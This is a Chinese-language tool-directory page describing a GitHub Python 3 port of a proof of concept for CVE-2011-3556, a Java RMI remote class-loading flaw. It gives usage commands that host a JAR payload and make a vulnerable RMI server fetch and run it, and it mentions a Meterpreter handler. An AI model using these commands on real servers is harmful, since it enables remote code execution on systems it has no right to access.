Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve_2011_3556 — 现有CVE-2011-3556概念验证(PoC)的Python 3实现。 | Kitploit
工具/GitHubGitHub/sk4la/cve_2011_3556
漏洞利用框架Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubsk4la/cve_2011_3556

cve_2011_3556

现有CVE-2011-3556概念验证(PoC)的Python 3实现。

查看仓库
127年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2011-3556 — 概念验证 (PoC)

免责声明

此工具是现有Metasploit框架中由mihi开发的概念验证 (PoC)的Python 3实现。

先决条件

使用此模块只需按照以下说明操作:

root@kitploit:~
# 将该仓库克隆到本地。
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# 可选地设置`x`位以能够直接执行脚本。
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

用法

命令行

为了被易受攻击的Java RMI服务器远程加载,有效载荷(一个JAR二进制文件)必须作为HTTP资源提供。可以使用著名的python3 -m http.server快速提供。

一旦有效载荷可供下载,只需执行exploit.py脚本即可触发漏洞。

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

如果有效载荷是一个Meterpreter(Metasploit框架),不要忘记use exploit/multi/handler。

库

此模块也可以作为库使用,将cve_2011_3556模块导入到当前命名空间:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

就是这么简单!

致谢

特别感谢mihi对Metasploit框架模块的初始实现。

下载工具